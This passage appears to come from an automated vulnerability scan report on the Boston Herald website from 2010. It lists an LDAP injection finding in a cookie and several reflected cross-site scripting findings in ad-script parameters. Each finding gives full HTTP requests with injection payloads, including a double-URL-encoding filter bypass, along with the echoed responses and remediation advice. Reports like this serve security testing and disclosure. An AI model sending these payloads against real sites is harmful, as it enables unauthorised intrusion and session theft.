11.23. http://bostonherald.com/news/regional/view/20101107bridge_work_hits_ducks_dinosaurs/srvc=news&position=also

11.24. http://bostonherald.com/news/regional/view/20101107church-sale_plan_causes_beef/format=comments&srvc=home&position=3

11.25. http://bostonherald.com/news/regional/view/20101107church-sale_plan_causes_beef/srvc=home&position=3

11.26. http://bostonherald.com/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/format=comments&srvc=home&position=2

11.27. http://bostonherald.com/news/regional/view/20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level/srvc=home&position=2

11.28. http://bostonherald.com/projects/your_tax_dollars.bg

11.29. http://bostonherald.com/projects/your_tax_dollars.bg

11.30. http://bostonherald.com/sports/baseball/red_sox/view.bg

11.31. http://bostonherald.com/sports/baseball/red_sox/view/20101107adrian_gonzalez_fit_for_red_sox_eventually/srvc=home&position=also

11.32. http://bostonherald.com/sports/columnists/view/20101107crushing_hit_on_david_krejci_puts_loss_in_perspective/srvc=home&position=also

11.33. http://bostonherald.com/sports/football/patriots/view.bg

11.34. http://bostonherald.com/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/format=comments&srvc=home&position=0

11.35. http://bostonherald.com/sports/football/patriots/view/20101107browns_overpower_patriots_34-14/srvc=home&position=0

11.36. http://bostonherald.com/store/

11.37. http://bostonherald.com/track/inside_track/view.bg

11.38. http://bostonherald.com/track/inside_track/view/20101107cake_boss_is_a_jersey_boy_at_heart/srvc=home&position=also

11.39. http://bostonherald.com/track/inside_track/view/20101107tracked_down_scott_listfield_terry_francona_joey_fatone__more/srvc=home&position=also

11.40. http://bostonherald.com/track/inside_track/view/20101107we_hearernie_boch_jr_sean_duffy__more/srvc=home&position=also

12. Robots.txt file

13. Content type incorrectly stated

13.1. http://bostonherald.com/home/includes/twitter.inc

13.2. http://bostonherald.com/news/includes/twitter.inc



1. LDAP injection  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bostonherald.com
Path:   /index.bg

Issue detail

The OAX cookie appears to be vulnerable to LDAP injection attacks.

The payloads c93cc7a8810fe7b9)(sn=* and c93cc7a8810fe7b9)!(sn=* were each submitted in the OAX cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /index.bg HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=c93cc7a8810fe7b9)(sn=*; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response 1

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 10:43:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 152345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // 728_SWAP_TEMPLATE // -
...[SNIP]...
<span class="blackText" style="font-weight:bold">59 minutes ago</span>
<span style="font-weight: normal;">&nbsp;|&nbsp;</span><a href="/search/?topic=Associated Press&type=byline&searchSite=recent&x=10&y=10">By Associated Press</a></div>
   WASHINGTON &mdash; The White House is seeking greater and swifter cooperation on intelligence sharing...
       
</div>
</div>
<div id="viewAllRecent">+&nbsp;<a class="LinksGreyLtrNone" href="latest">More Recent Headlines</a></div>





</div>
</div>
<!--// RECENT END//-->




<!--//SPECIALS - STYLE 6 END//-->
</div>
    </div>
   
</div>
<!--// CONTAINER TOP END//-->

<!--// SPORTS SCORES //-->

<!--pats spirit
<div class="midTease">
    <div id="patsSpirit">
<a href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=1139','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img border="0" src="http://bh.heraldinteractive.com/news/includes/fans_tease.bg"></a>
<div style="float:left; margin-left:-5px; padding-top:10px; line-height:16px; text-align:center;">
<a style="color: #fc0" href="http://www.bostonherald.com/sports/football/patriot_moments/">Upload your photos</a>&nbsp;&nbsp;|&nbsp;&nbsp;<a style="color: #fc0" href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=1139','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')">View fan photos</a>&nbsp;&nbsp;|&nbsp;&nbsp;<a style="color: #fc0" href="/sports/football/patriot_moments/tell_us.bg">Voice your Patriot-ism!</a>
</div>
</div>
</div>
pats spirit end-->



<!--//scores//-->
<!--//
//-->
<!--//scores end//-->

<!--// end SPORTS SCORES //-->

<!--// CONTAINER MID//-->


<div id="containerMid">

<!--// MID THREE //-->
<div id="containerMidThree" style="margin-top: 0px" >
<div id="containerMidThreeInner">

<!--// AD CONTAINER //-->

...[SNIP]...

Request 2

GET /index.bg HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=c93cc7a8810fe7b9)!(sn=*; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response 2

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 10:43:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 151825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // 728_SWAP_TEMPLATE // -
...[SNIP]...
<span class="blackText" style="font-weight:bold">56 minutes ago</span>
<span style="font-weight: normal;">&nbsp;|&nbsp;</span><a href="/search/?topic=Associated Press&type=byline&searchSite=recent&x=10&y=10">By Associated Press</a></div>
   WASHINGTON &mdash; The White House is seeking greater and swifter cooperation on intelligence sharing...
       
</div>
</div>
<div id="viewAllRecent">+&nbsp;<a class="LinksGreyLtrNone" href="latest">More Recent Headlines</a></div>





</div>
</div>
<!--// RECENT END//-->




<!--//SPECIALS - STYLE 6 END//-->
</div>
    </div>
   
</div>
<!--// CONTAINER TOP END//-->

<!--// SPORTS SCORES //-->

<!--pats spirit
<div class="midTease">
    <div id="patsSpirit">
<a href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=1139','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img border="0" src="http://bh.heraldinteractive.com/news/includes/fans_tease.bg"></a>
<div style="float:left; margin-left:-5px; padding-top:10px; line-height:16px; text-align:center;">
<a style="color: #fc0" href="http://www.bostonherald.com/sports/football/patriot_moments/">Upload your photos</a>&nbsp;&nbsp;|&nbsp;&nbsp;<a style="color: #fc0" href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=1139','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')">View fan photos</a>&nbsp;&nbsp;|&nbsp;&nbsp;<a style="color: #fc0" href="/sports/football/patriot_moments/tell_us.bg">Voice your Patriot-ism!</a>
</div>
</div>
</div>
pats spirit end-->



<!--//scores//-->
<!--//
//-->
<!--//scores end//-->

<!--// end SPORTS SCORES //-->

<!--// CONTAINER MID//-->


<div id="containerMid">

<!--// MID THREE //-->
<div id="containerMidThree" style="margin-top: 0px" >
<div id="containerMidThreeInner">

<!--// AD CONTAINER //-->

...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 27 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://bostonherald.com/includes/processAds.bg [companion parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99318</script><script>alert(1)</script>e0201f2d5a4 was submitted in the companion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom99318</script><script>alert(1)</script>e0201f2d5a4&page=bh.heraldinteractive.com%2Fnews%2Fhome HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; RMFD=011PFFPzO101yed8; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.11.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:32:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2058
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom99318</script><script>alert(1)</script>e0201f2d5a4!Top">
...[SNIP]...

2.2. http://bostonherald.com/includes/processAds.bg [companion parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f85d0"><script>alert(1)</script>5038fb52a5f was submitted in the companion parameter. This input was echoed as f85d0\"><script>alert(1)</script>5038fb52a5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottomf85d0"><script>alert(1)</script>5038fb52a5f&page=bh.heraldinteractive.com%2Fnews%2Fhome HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; RMFD=011PFFPzO101yed8; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.11.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:32:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2022
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottomf85d0\"><script>alert(1)</script>5038fb52a5f!Top">
...[SNIP]...

2.3. http://bostonherald.com/includes/processAds.bg [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbc2b"><script>alert(1)</script>b0be5ee5a8c was submitted in the page parameter. This input was echoed as cbc2b\"><script>alert(1)</script>b0be5ee5a8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhomecbc2b"><script>alert(1)</script>b0be5ee5a8c HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; RMFD=011PFFPzO101yed8; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.11.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:32:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2022
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/homecbc2b\"><script>alert(1)</script>b0be5ee5a8c@Top,Middle,Middle1,Bottom!Top">
...[SNIP]...

2.4. http://bostonherald.com/includes/processAds.bg [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 396d4%2527%253balert%25281%2529%252f%252fe57802ac0a0 was submitted in the page parameter. This input was echoed as 396d4';alert(1)//e57802ac0a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome396d4%2527%253balert%25281%2529%252f%252fe57802ac0a0 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; RMFD=011PFFPzO101yed8; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.11.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:32:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 1926
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
'HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home396d4';alert(1)//e57802ac0a0@Top,Middle,Middle1,Bottom!Top">
...[SNIP]...

2.5. http://bostonherald.com/includes/processAds.bg [position parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30e13</script><script>alert(1)</script>1c8d3b711d6 was submitted in the position parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=Top30e13</script><script>alert(1)</script>1c8d3b711d6&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; RMFD=011PFFPzO101yed8; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.11.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:32:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2053
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
EBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top30e13</script><script>alert(1)</script>1c8d3b711d6">
...[SNIP]...

2.6. http://bostonherald.com/includes/processAds.bg [position parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5383e"><script>alert(1)</script>c79e43a946d was submitted in the position parameter. This input was echoed as 5383e\"><script>alert(1)</script>c79e43a946d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top5383e"><script>alert(1)</script>c79e43a946d&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; RMFD=011PFFPzO101yed8; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.11.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:32:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2017
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top5383e\"><script>alert(1)</script>c79e43a946d">
...[SNIP]...

2.7. http://bostonherald.com/mediacenter/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /mediacenter/

Issue detail

